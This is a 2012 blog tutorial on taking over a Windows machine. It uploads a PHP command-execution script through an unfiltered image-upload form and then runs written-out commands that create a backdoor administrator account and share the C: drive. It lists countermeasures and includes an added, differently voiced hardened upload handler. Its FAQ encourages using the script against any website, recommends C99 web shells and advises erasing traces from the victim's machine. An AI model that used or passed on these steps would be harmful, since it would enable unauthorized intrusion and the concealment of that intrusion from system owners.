Date : June 2, 2012
Type : Tutorial
Level : Easy
Actually this post is a little bit different from my other posts because I put the date attribute at the top of it. That's because today is my birthday and I want to say thank you to all the followers of this blog on Twitter, Facebook (which reached 1K+ on my birthday 🙂 ), NetworkedBlogs, e-mail, or those of you who came here from Google, Baidu, Yahoo, Bing, etc. It's because of all of you that I really love writing this tutorial and sharing blog with you. Thank you…
Today's quote for me and also for my blog readers:
The title sounds provocative 😛 but it's true that with PHP code you can hack a system, someone's PC, or even a web server.
Today's tutorial background story comes from my experience as a university student…
In Indonesia, while I was pursuing my bachelor's degree (around 2002-2003), I lived in a rented room: a house with many rooms that the owner rents out to students for a monthly fee; in Indonesian this is called "nge-kost". I lived with some friends who were pursuing the same degree in the computer field, and we also had the same homework: how to upload an image to a web server 😛 .
Here's the network topology of my "kost" at that time:
We could access other users' machines if we had access to that PC (a common LAN topology, isn't it?), and port 80 was a public port that everyone could use.
We did that homework together, and of course I knew in which folder he put that upload feature (because we tested it together).
For this hack to work, PHP safe_mode must be set to OFF, but for web development many developers and new learners use XAMPP, WAMP, etc., which come with safe_mode set to OFF by default. The other requirement was that there was no extension filter on the type of file being uploaded.
You also need to know which programming language the web server is running; in this example it is PHP, so it will be different for ASP, JSP, etc.
1. Upload Image PHP Script
2. PHP exec script
Download both files below from mediafire.com:
1. Know the upload feature (in my case, the folder where my friend put his script for the upload feature).
2. Access the address and upload your PHP exec script. In the picture below I'm using myscript.php as the PHP exec script name.
3. In this tutorial every uploaded file is saved in a folder named "data" on the web server, because I made this script very simple. But in the real world, if you want to know in which folder the data/image was uploaded, you can follow the trailing slash after the file has been uploaded (in the preview section).
4. Now I will access the folder called data with my file inside it called myscript.php, and try to run a simple command, dir c:\.
5. As you can see from step 4, now I can even run the commands below.
   1. net user /add v4L 12345 --> this command will add a new user v4L with password 12345
   2. net localgroup administrators v4L /add --> this will add username v4L to the administrators group
   3. net share concfg*C:\/grant:v4L,full --> this command will give full administrator rights to the user
6. Here's the result 🙂
Only from an upload feature and I could own his computer 🙂 …but after that I told him about this and we fixed it together…LoL
1. Turn ON your PHP safe_mode (click here to view the tutorial on how to turn php safe_mode ON)
2. Always turn ON UAC (User Account Control) on Vista and Windows 7, because some users turn it off (including me 😛 ) because they don't like the pop-up window when running a program…LoL
3. For developers: make sure you always filter and sanitize the data.
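Countermeasure 3 is the one a developer can always apply, and since safe_mode was removed in PHP 5.4 it is the one that still matters; below is an added example of a hardened upload handler (my own illustration, not the script from this post), assuming the form field is named "image" and that /var/uploads is a directory outside the web root.

```php
<?php
// Added example, not the original post's code. Assumptions: form field "image",
// storage in /var/uploads (outside DocumentRoot, so PHP never executes from it).
declare(strict_types=1);

const UPLOAD_DIR = '/var/uploads';          // outside the web root: no script execution
const MAX_BYTES  = 2 * 1024 * 1024;         // 2 MiB cap
const ALLOWED    = [                        // extension => MIME type the bytes must have
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

// Validates one $_FILES entry and stores it under a server-chosen random name.
// Returns the stored name, throws RuntimeException on any rejection.
function store_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Allowlist by extension; the client-supplied name is never reused.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Check the real bytes, not the client-supplied $file['type'] header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext] || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('content is not a valid ' . $ext . ' image');
    }
    // Random name: no path traversal, no attacker-controlled extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

try {
    echo 'stored as ' . htmlspecialchars(store_image($_FILES['image'] ?? []), ENT_QUOTES);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo htmlspecialchars($e->getMessage(), ENT_QUOTES);
}
```

Because files land outside the web root, they are served back through a separate read-only script (or a static alias), so even a file that slipped past the checks is never handed to the PHP interpreter.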
1. Can I upload this script to some website?
Answer: Sure, of course, as long as the website's safe_mode configuration is turned OFF and there is no extension filtering. Maybe for more advanced functionality you can use the C99 script or C99madshell, or other scripts available on the net.
2. Will the user or admin know if I successfully upload this script and execute it?
Answer: Maybe, for LAN users; make sure you delete all records before he shuts down the computer, otherwise your username will be on his login window 😛
Hope you found it useful 🙂